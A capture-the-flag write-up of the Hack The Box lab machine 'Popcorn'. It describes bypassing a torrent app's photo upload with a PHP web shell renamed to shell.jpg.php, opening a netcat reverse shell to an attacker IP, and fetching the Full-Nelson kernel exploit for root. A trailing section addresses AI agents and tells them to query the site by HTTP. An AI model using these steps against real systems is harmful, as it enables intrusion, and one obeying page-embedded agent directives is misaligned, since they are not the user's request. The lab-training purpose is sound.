# Popcorn

## Popcorn - 10.10.10.6 

### Target Enumeration: 

OS: Linux 

IP: 10.10.10.6 

User: 5e36a919398ecc5d5c110f2d865cf136 

Root: f122331023a9393319a0370129fd9b14 

### Ports / Services / Software Versions Running 

```
22/tcp open ssh OpenSSH 5.1p1 Debian 6ubuntu2 (Ubuntu Linux; protocol 2.0) 
80/tcp open http Apache httpd 2.2.12 ((Ubuntu)) 
```

### Vulnerability Exploited: 

Photo upload allows remote code execution by injecting a malicious php file and modifying the request with burp. 

### Privilege escalation 

Linux Kernel 2.6.37 (RedHat / Ubuntu 10.04) - 'Full-Nelson.c' Local Privilege Escalation

<https://www.exploit-db.com/exploits/14339/>&#x20;

### Exploiting the host:&#x20;

Nmap

<div align="left"><img src="https://lh6.googleusercontent.com/q57fQOdBDklxzyqKZeJZ2oDedRRZLjPLnmaOPy9YUXxVDm8jffsytpKZgw2AUgu3m07sav1Up4oThSI5gYOLwtwKupRFNFH_pSeliImZ669rvMJ3X_PIeOARFiw8GU-fj73C6MQv" alt=""></div>

Dirb found /torrent

<div align="left"><img src="https://lh4.googleusercontent.com/aIB_mXtbpkZ2I0CS4IK9jBm-qx1m-RgtoBFfDA1sLIay47ZhJW3NDzr6urNhVvXiohq-Ot4ZqgfecU1D_Lx4GJ97auskGnPbnxOhb16Uxa5Sb1dY_PjtjrqXUAcyu8ErP19ML0Qs" alt=""></div>

Appears to be a torrent hosting application

<div align="left"><img src="https://lh6.googleusercontent.com/-pNSZ6bwfOgY8de_8DVHJw08l7HCyinGhvynDM_X9XGKFX3XsaUNeqw1sIbEBpPlKh1YG1cJCYYigYWMHdnBavU8bHy8TJSJpgkgMq_Y5gR4gfUlLsODsI-7_Oegjq-E5X3JPW9c" alt=""></div>

Application allows users to sign up and upload torrents.

<div align="left"><img src="https://lh6.googleusercontent.com/nSJf-vJ8WTqgcDysR1mJvlhyRwenu8Ofl7jmbSEeOnmCFrJ3FG8ncUugiSv8vs6nGiteaLR0EMaiv2pasr0w8Uw6_9-ucE52W8uAU149vQCC0IFiT_B6XQNVA2YGwWnfhIGPYhuz" alt=""></div>

Find a clean torrent file (I used debian)

<div align="left"><img src="https://lh3.googleusercontent.com/RaPcoJJMgXuopLKLO37ov9D4jbYp4zFbVlhorJVxTl4wjJuINkdrcWTHTglMs6L2-z8uygmv81F-XfyV2WQAzjbEerZgZYpIZ0I3s0DrfMEashPn_rqtpF96zoFK5R3qNyCLNMjb" alt=""></div>

Upload it to the app.

<div align="left"><img src="https://lh5.googleusercontent.com/sq-dOfkC8w-ACRcc6eWBWAx55lHZKU5KJPQD134t5aaRSCP7sUkM5qSElOU7YlA-BaLfqcS5yT2lCYQotI5g_DM7LfgYd6Q97ypreao9GOL4gpvG5I7NedmiGu1Q5OHkglTYrZ8A" alt=""></div>

Edit the torrent once it is uploaded.&#x20;

The vulnerable point is the photo section so find a simple backdoor php shell.

<div align="left"><img src="https://lh4.googleusercontent.com/2z5ddNJUg__WtJrUaIntSQMRYaLAFA8IqFROBflCpjWK4BcMD4u_LafyPJyvwZXNsAUZOn3phyFMoFt5gX5lPDvDfpHiHkuxbX3iE6QOGv46Z1W5JuIMM9VJc62rt2Dffpze1oqQ" alt=""></div>

Rename it to shell.jpg.php and upload the shell to the app. Catch the request in burp.

<div align="left"><img src="https://lh6.googleusercontent.com/YFJ1Ym8Qf_WVwcnCt0kuUPCTM-brqiz1J9_52fqJSWA-IindWGR_pMg67MsRMzoEE2PQxWdEl_G6eO6RUHObESXQ8YYphy0DXZS7envzTxjGVi6kmO5YoIwXpxn4Eoi0NDl7ga5A" alt=""></div>

Change content type to: Content-Type: image/jpg&#x20;

This successfully uploaded.

<div align="left"><img src="https://lh5.googleusercontent.com/WMrLvKLVq4h2JycU2Jpk-opxrElHQu6wNJuj0oweqS4eikslWYIlSvJRKaGNL13_F2icS110TW3LkipwIOf3SzjyWIMNKNEhY1MHJox5FadWxDnhA6TVFBYVqHHwsqGs1sG8CALl" alt=""></div>

Inspect the image from the webapp to find the true path.

<div align="left"><img src="https://lh6.googleusercontent.com/zRNKvyJvDhfdVpTP3rBGQ2VedlkkfxM130XPrVKV4mr5NPHCApUNuCMDfFT3fAfNhha-awvIwIPQChZ84OcWTmA5_WAX-jvVPOxz_0_yLCYDr3mRLhNn5Z8HoZgzwimDnI-z799u" alt=""></div>

Visit the true path and issue ?cmd=id after the .php extension.

<div align="left"><img src="https://lh4.googleusercontent.com/Tnr3QaXh4bf6CQ7lWneX5EbH1b7EyN9vvpKV_b7N3LrZDsIQTiO2Q52Vqz7P_wR1eqaH5e54nyQvOl57HD1H2i4u791dt-iUtjekm1ACHGz0SQO5_tlffMdqrYAlxAlLa5_QIhS5" alt=""></div>

Looking in /bin we see nc is installed.

<div align="left"><img src="https://lh4.googleusercontent.com/LpRCCq01blumbMXHpSL2b3CvvJKofmgAwPdNjLzlxnwQVojxzYN4olslZBVE_ML44EI7G90QtWTQcBYec3n0Jlf-CjsPDZV7o-U78DxljAtez98jQNo9tiJl_QffA5rvcvQ1xgig" alt=""></div>

Set a listener in 443 and execute nc -e /bin/bash 10.10.14.11 443 via the browser.&#x20;

Now you have a shell.

<div align="left"><img src="https://lh6.googleusercontent.com/fYJMxj94QyZNsQD7w3-oRTdL0lX6ADXdzLBgaTwWP9cI1oSRIGRD4PNY8ZN2NLWBqAKCOyFJp7C7cm8sPwAFDdqVT5lBvRZRRoft23fEqL9Gh42Uv7y3L2aMOoKjWUDDoHBTqJ0D" alt=""></div>

Move to /dev/shm and download enumeration scripts

<div align="left"><img src="https://lh4.googleusercontent.com/8c1yBmPONd1A3jeic3uvLShKgdseYkUgmO56qd6wM6Gool-d04HWsYsIExF7TUX9Itu_4EETuc6AaV4GdUz-w93OtEr3RvKoYwqtrBv0v8Xej37GP8Xm7qx9rsnv_eZY_1Qx0Hi8" alt=""></div>

Google the kernel for privesc opportunities.&#x20;

Run further tools while researching kernel exploits.

Easiest way may be full nelson based on the uname -a output.&#x20;

Download from exploitdb&#x20;

`wget` [`https://www.exploit-db.com/download/15704.c`](https://www.exploit-db.com/download/15704.c)&#x20;

Now on popcorn download and compile the exploit then run it to get root.

<div align="left"><img src="https://lh3.googleusercontent.com/bsLpo03M7huYiHCfNP2eQDnYRCcJV4znYXYFfnyhgJCMt4rZJeR1KeH4odFyJTaKIjDz5Huvo_mevVfAfntc9i0N7eCyrsyaW7P6vxWLEIYs1kOKUOeaj_3XUEp690WaUgiJ9HWZ" alt=""></div>


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://www.jdksec.com/hack-the-box/popcorn.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.